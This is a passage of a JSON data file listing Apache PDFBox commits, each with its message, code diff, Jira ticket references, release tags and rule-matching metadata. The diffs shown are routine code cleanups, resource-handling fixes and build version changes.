"- raf = null;", + "+ if (raf != null)", + "+ {", + "+ raf.close();", + "+ raf = null;", + "+ }", + " }" + ], + "changed_files": [ + "fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4242": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "8db47637a885e9538bdf7a94b4686b0146ac0c20" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4242", + "relevance": 2 + } + ] + }, + { + "commit_id": "d06b05943f91cd56aa3e62641791dc5e1dda4ed9", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532246612, + "hunks": 1, + "message": "PDFBOX-4184: compare sizes of different strategies for small non 16 bit images git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836425 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index a90175811..3b81dbe43 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -85,2 +85,18 @@ public final class LosslessFactory", + " {", + "+ if (pdImageXObject.getBitsPerComponent() < 16 &&", + "+ image.getWidth() * image.getHeight() <= 50 * 50)", + "+ {", + "+ // also create classic compressed image, compare sizes", + "+ PDImageXObject pdImageXObjectClassic = createFromRGBImage(image, document);", + "+ if (pdImageXObjectClassic.getCOSObject().getLength() < ", + "+ pdImageXObject.getCOSObject().getLength())", + "+ {", + "+ pdImageXObject.getCOSObject().close();", + "+ return pdImageXObjectClassic;", + "+ }", + "+ else", + "+ {", + "+ pdImageXObjectClassic.getCOSObject().close();", + "+ }", + "+ }", + " return pdImageXObject;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "c8204dea26835ab4476c9f12513eccb759d071ea" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "5bd0880f4bd783d56ee132cd964f87f97ac1df84", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531330799, + "hunks": 2, + "message": "PDFBOX-4071: update apache parent number git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835650 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 9a1c4816d..86b47b965 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -25,3 +25,3 @@", + " apache", + "- 19", + "+ 20", + " ", + "@@ -51,7 +51,2 @@", + "- ", + "- 2.21.0", + " 1.60" + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "b970999bdf4e8129bfad4c33f0d6c77312d24be9" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "05a82f7c1fa951344576921fd25fb52ae25c9c0f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526745806, + "hunks": 10, + "message": "PDFBOX-3353: simplify code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831906 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index 340de6643..7bff8b71b 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -256,3 +256,4 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "- switch (annotation.getStartPointEndingStyle())", + "+ String startPointEndingStyle = annotation.getStartPointEndingStyle();", + "+ switch (startPointEndingStyle)", + " {", + "@@ -261,3 +262,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " drawArrow(cs, ab.width, y, ab.width * 9);", + "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(annotation.getStartPointEndingStyle()))", + "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(startPointEndingStyle))", + " {", + "@@ -282,3 +283,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " drawArrow(cs, -ab.width, y, -ab.width * 9);", + "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(annotation.getStartPointEndingStyle()))", + "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(startPointEndingStyle))", + " {", + "@@ -297,3 +298,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- if (INTERIOR_COLOR_STYLES.contains(annotation.getStartPointEndingStyle()))", + "+ if (INTERIOR_COLOR_STYLES.contains(startPointEndingStyle))", + " {", + "@@ -301,3 +302,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- else if (!PDAnnotationLine.LE_NONE.equals(annotation.getStartPointEndingStyle()))", + "+ else if (!PDAnnotationLine.LE_NONE.equals(startPointEndingStyle))", + " {", + "@@ -307,3 +308,4 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "- switch (annotation.getEndPointEndingStyle())", + "+ String endPointEndingStyle = annotation.getEndPointEndingStyle();", + "+ switch (endPointEndingStyle)", + " {", + "@@ -312,3 +314,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " drawArrow(cs, lineLength - ab.width, y, -ab.width * 9);", + "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(annotation.getEndPointEndingStyle()))", + "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(endPointEndingStyle))", + " {", + "@@ -333,3 +335,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " drawArrow(cs, lineLength + ab.width, y, ab.width * 9);", + "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(annotation.getEndPointEndingStyle()))", + "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(endPointEndingStyle))", + " {", + "@@ -348,3 +350,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- if (INTERIOR_COLOR_STYLES.contains(annotation.getEndPointEndingStyle()))", + "+ if (INTERIOR_COLOR_STYLES.contains(endPointEndingStyle))", + " {", + "@@ -352,3 +354,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- else if (!PDAnnotationLine.LE_NONE.equals(annotation.getEndPointEndingStyle()))", + "+ else if (!PDAnnotationLine.LE_NONE.equals(endPointEndingStyle))", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "d0d84f7a226ba7deefd6171aab6059986ec242b8" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "bfede6dd7e05614a83ab1595b35511babbbd7b23", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531643421, + "hunks": 1, + "message": "PDFBOX-4071: use correct type cast git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835950 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java", + "index 7bc457830..bb149ce9a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java", + "@@ -178,3 +178,3 @@ public class COSDictionaryMap implements Map", + " {", + "- COSDictionaryMap other = (COSDictionaryMap)o;", + "+ COSDictionaryMap other = (COSDictionaryMap) o;", + " retval = other.map.equals( this.map );" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "6435f5e24458f174924f75f70e77e710749dd5b0" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "4cf00eb5406739565561ccf28aa74b521f7ca19a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530513744, + "hunks": 17, + "message": "PDFBOX-4184: sonar fix; remove println from test git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834822 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index 457d9825b..926fc578f 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -310,5 +310,6 @@ public final class LosslessFactory", + "- // This variable store a row of the image each, the exact type depends", + "+ // These variables store a row of the image each, the exact type depends", + " // on the image encoding. Can be a int[], short[] or byte[]", + "- Object prevRow, transferRow;", + "+ Object prevRow;", + "+ Object transferRow;", + "@@ -458,8 +459,6 @@ public final class LosslessFactory", + "- {", + "- // We swap prev and transfer row, so that we have the prev row for the next row.", + "- Object temp = prevRow;", + "- prevRow = transferRow;", + "- transferRow = temp;", + "- }", + "+ // We swap prev and transfer row, so that we have the prev row for the next row.", + "+ Object temp = prevRow;", + "+ prevRow = transferRow;", + "+ transferRow = temp;", + " }", + "@@ -475,3 +474,3 @@ public final class LosslessFactory", + " int val = transferRow[indexInTranferRow];", + "- byte b0 = (byte) ((val & 0xFF));", + "+ byte b0 = (byte) (val & 0xFF);", + " byte b1 = (byte) ((val >> 8) & 0xFF);", + "@@ -482,3 +481,2 @@ public final class LosslessFactory", + " case BufferedImage.TYPE_INT_BGR:", + "- {", + " targetValues[0] = b0;", + "@@ -487,5 +485,3 @@ public final class LosslessFactory", + " break;", + "- }", + " case BufferedImage.TYPE_INT_ARGB:", + "- {", + " targetValues[0] = b2;", + "@@ -499,3 +495,2 @@ public final class LosslessFactory", + " break;", + "- }", + " case BufferedImage.TYPE_INT_RGB:", + "@@ -521,7 +516,8 @@ public final class LosslessFactory", + " {", + "- for (int i = 0; i < targetValues.length;)", + "+ int itr = indexInTranferRow;", + "+ for (int i = 0; i < targetValues.length; i += 2)", + " {", + "- short val = transferRow[indexInTranferRow++];", + "- targetValues[i++] = (byte) ((val >> 8) & 0xFF);", + "- targetValues[i++] = (byte) (val & 0xFF);", + "+ short val = transferRow[itr++];", + "+ targetValues[i] = (byte) ((val >> 8) & 0xFF);", + "+ targetValues[i + 1] = (byte) (val & 0xFF);", + " }", + "@@ -529,3 +525,3 @@ public final class LosslessFactory", + " {", + "- short alpha = transferRow[indexInTranferRow];", + "+ short alpha = transferRow[itr];", + " alphaImageData[alphaPtr] = (byte) ((alpha >> 8) & 0xFF);", + "@@ -548,4 +544,3 @@ public final class LosslessFactory", + " {", + "- ICC_ColorSpace icc_colorSpace = (ICC_ColorSpace) srcCspace;", + "- ICC_Profile profile = icc_colorSpace.getProfile();", + "+ ICC_Profile profile = ((ICC_ColorSpace) srcCspace).getProfile();", + " // We only encode a color profile if it is not sRGB", + "@@ -647,6 +642,6 @@ public final class LosslessFactory", + " int pc = Math.abs(p - c);", + "- final int Pr;", + "+ final int pr;", + " if (pa <= pb && pa <= pc)", + " {", + "- Pr = a;", + "+ pr = a;", + " }", + "@@ -654,3 +649,3 @@ public final class LosslessFactory", + " {", + "- Pr = b;", + "+ pr = b;", + " }", + "@@ -658,6 +653,6 @@ public final class LosslessFactory", + " {", + "- Pr = c;", + "+ pr = c;", + " }", + "- int r = x - Pr;", + "+ int r = x - pr;", + " return (byte) (r);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "9fbeca0253b32ca8194ed5b5f58cdb6b54429544" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "48baf0dd4571268c69253133aa5e45ce2b55be5e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531332197, + "hunks": 4, + "message": "PDFBOX-4071: add cast / type git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835657 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java", + "index 2c6bde09b..e9abf76af 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java", + "@@ -61,2 +61,3 @@ import org.bouncycastle.tsp.TSPException;", + " import org.bouncycastle.tsp.TimeStampToken;", + "+import org.bouncycastle.util.Selector;", + " import org.bouncycastle.util.Store;", + "@@ -259,3 +260,4 @@ public final class ShowSignature", + " SignerInformation signerInformation = signers.iterator().next();", + "- Collection matches = certificatesStore.getMatches(signerInformation.getSID());", + "+ Collection matches =", + "+ certificatesStore.getMatches((Selector) signerInformation.getSID());", + " X509CertificateHolder certificateHolder = matches.iterator().next();", + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", + "index 9cf8c06c2..57beb6b3f 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", + "@@ -52,2 +52,3 @@ import org.bouncycastle.tsp.TSPException;", + " import org.bouncycastle.tsp.TimeStampToken;", + "+import org.bouncycastle.util.Selector;", + " import org.bouncycastle.util.Store;", + "@@ -232,3 +233,3 @@ public class CertInformationCollector", + " Collection matches = certificatesStore", + "- .getMatches(signerInformation.getSID());", + "+ .getMatches((Selector) signerInformation.getSID());" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java", + "examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "70ddc21473c07f041579dcf02c94ac8f6cdbd6e6" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "16b31cd9b3a670636b1f0ca808ab0bbf6323c760", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525938700, + "hunks": 1, + "message": "PDFBOX-4218: respect the interpolation setting when scaling masked image git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831313 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java", + "index d26365e4f..8eb76de28 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java", + "@@ -539,6 +539,9 @@ public final class PDImageXObject extends PDXObject implements PDImage", + " Graphics2D g = image2.createGraphics();", + "- g.setRenderingHint(RenderingHints.KEY_INTERPOLATION,", + "- RenderingHints.VALUE_INTERPOLATION_BICUBIC);", + "- g.setRenderingHint(RenderingHints.KEY_RENDERING,", + "- RenderingHints.VALUE_RENDER_QUALITY);", + "+ if (getInterpolate())", + "+ {", + "+ g.setRenderingHint(RenderingHints.KEY_INTERPOLATION,", + "+ RenderingHints.VALUE_INTERPOLATION_BICUBIC);", + "+ g.setRenderingHint(RenderingHints.KEY_RENDERING,", + "+ RenderingHints.VALUE_RENDER_QUALITY);", + "+ }", + " g.drawImage(image, 0, 0, width, height, 0, 0, image.getWidth(), image.getHeight(), null);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4218": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "2331d0b2bfeb24aa187cd1c005528ae5eeef961e" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4218", + "relevance": 2 + } + ] + }, + { + "commit_id": "97570b0ac9a3d03f6354ba487405c610f4b244a4", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525958777, + "hunks": 1, + "message": "PDFBOX-4071: remove commented out line git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831340 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index e46ee907e..51aaca1b4 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -243,4 +243,2 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- //prepareResources(cs);", + "-", + " cs.beginText();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "2c36d4fc667c75c06b136a97cb5c55bdeb7eb2ca", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531499355, + "hunks": 1, + "message": "PDFBOX-4071, PDFBOX-4266: revert 1835649 with comment due to failure to build on jdk6 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835848 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 85737d43b..584864b57 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -25,3 +25,7 @@", + " apache", + "- 20", + "+", + "+ ", + "+ 19", + "+", + " " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "", + "PDFBOX-4266": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071, PDFBOX-4266", + "relevance": 2 + } + ] + }, + { + "commit_id": "4beb923433249dbd70e6823f9483edfbd9a18559", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528552750, + "hunks": 4, + "message": "PDFBOX-4071: move according to java coding convention git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1833238 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "index 0ff1d214d..4b7fbe837 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "@@ -32,35 +32,2 @@ public abstract class BlendMode", + " {", + "- /**", + "- * Determines the blend mode from the BM entry in the COS ExtGState.", + "- *", + "- * @param cosBlendMode name or array", + "- * @return blending mode", + "- */", + "- public static BlendMode getInstance(COSBase cosBlendMode)", + "- {", + "- BlendMode result = null;", + "- if (cosBlendMode instanceof COSName)", + "- {", + "- result = BLEND_MODES.get(cosBlendMode);", + "- }", + "- else if (cosBlendMode instanceof COSArray)", + "- {", + "- COSArray cosBlendModeArray = (COSArray) cosBlendMode;", + "- for (int i = 0; i < cosBlendModeArray.size(); i++)", + "- {", + "- result = BLEND_MODES.get(cosBlendModeArray.getObject(i));", + "- if (result != null)", + "- {", + "- break;", + "- }", + "- }", + "- }", + "-", + "- if (result != null)", + "- {", + "- return result;", + "- }", + "- return BlendMode.NORMAL;", + "- }", + "-", + " public static final SeparableBlendMode NORMAL = new SeparableBlendMode()", + "@@ -242,2 +209,5 @@ public abstract class BlendMode", + "+ // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", + "+ private static final Map BLEND_MODES = createBlendModeMap();", + "+", + " BlendMode()", + "@@ -246,2 +216,35 @@ public abstract class BlendMode", + "+ /**", + "+ * Determines the blend mode from the BM entry in the COS ExtGState.", + "+ *", + "+ * @param cosBlendMode name or array", + "+ * @return blending mode", + "+ */", + "+ public static BlendMode getInstance(COSBase cosBlendMode)", + "+ {", + "+ BlendMode result = null;", + "+ if (cosBlendMode instanceof COSName)", + "+ {", + "+ result = BLEND_MODES.get(cosBlendMode);", + "+ }", + "+ else if (cosBlendMode instanceof COSArray)", + "+ {", + "+ COSArray cosBlendModeArray = (COSArray) cosBlendMode;", + "+ for (int i = 0; i < cosBlendModeArray.size(); i++)", + "+ {", + "+ result = BLEND_MODES.get(cosBlendModeArray.getObject(i));", + "+ if (result != null)", + "+ {", + "+ break;", + "+ }", + "+ }", + "+ }", + "+", + "+ if (result != null)", + "+ {", + "+ return result;", + "+ }", + "+ return BlendMode.NORMAL;", + "+ }", + "+", + " private static int get255Value(float val)", + "@@ -371,5 +374,2 @@ public abstract class BlendMode", + "- // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", + "- private static final Map BLEND_MODES = createBlendModeMap();", + "-", + " private static Map createBlendModeMap()" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "00f7a9acb9c28aafbc68d05e610ac64233ef50d8", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530032450, + "hunks": 0, + "message": "readded accidentically deleted tags git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/1.2.1@1834451 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "a8c51acf4ca61b58473f4cad1b5b15426d97daf1" + ], + [ + "no-tag", + "556ae1aaec681dd883c09079af304d7e30db1f97" + ], + [ + "no-tag", + "618f05e1f4650b4a856cb2341b3c8dc99c363eb9" + ], + [ + "no-tag", + "2d374c65b206469c725b790a9783d389e57d2b7e" + ], + [ + "no-tag", + "df408e9a28d668ea3cbb9f9656cdfc541c437bb4" + ], + [ + "no-tag", + "313e29d56baa1d074519629c9bbcab98bece2fd6" + ], + [ + "no-tag", + "52e12df5c51b0eef320ff731028facf531cf52d2" + ], + [ + "no-tag", + "402d15ba73a4b394efebe3b8703893e0c2f5b409" + ], + [ + "no-tag", + "ba299e77314967a5e5c806bac6b918d95c2147f0" + ], + [ + "no-tag", + "6e177c78b9557ce15f22cc7ba48906c86d30b2e4" + ], + [ + "no-tag", + "a6cb7b07997b0e324708cb73d1b224f8ebe60c0b" + ], + [ + "no-tag", + "1400def5c88140cc9be1245b9b4774a9d558d73c" + ], + [ + "no-tag", + "da541a2ea6c839cddd3ed43ae29110adc60d19d0" + ], + [ + "no-tag", + "1d6c1941f5c2e4097f63b37bcfd906ced5509d12" + ], + [ + "no-tag", + "f98cccc1322157ba704de80aa794290df43abf49" + ], + [ + "no-tag", + "ac9c5c440af820b372f56f53835316ec2b943963" + ], + [ + "no-tag", + "48ba8b28ba8b7743c8608b368b521c1f97abc118" + ], + [ + "no-tag", + "2b8d37ebb43750a82575f0fb3f137739db2ade73" + ], + [ + 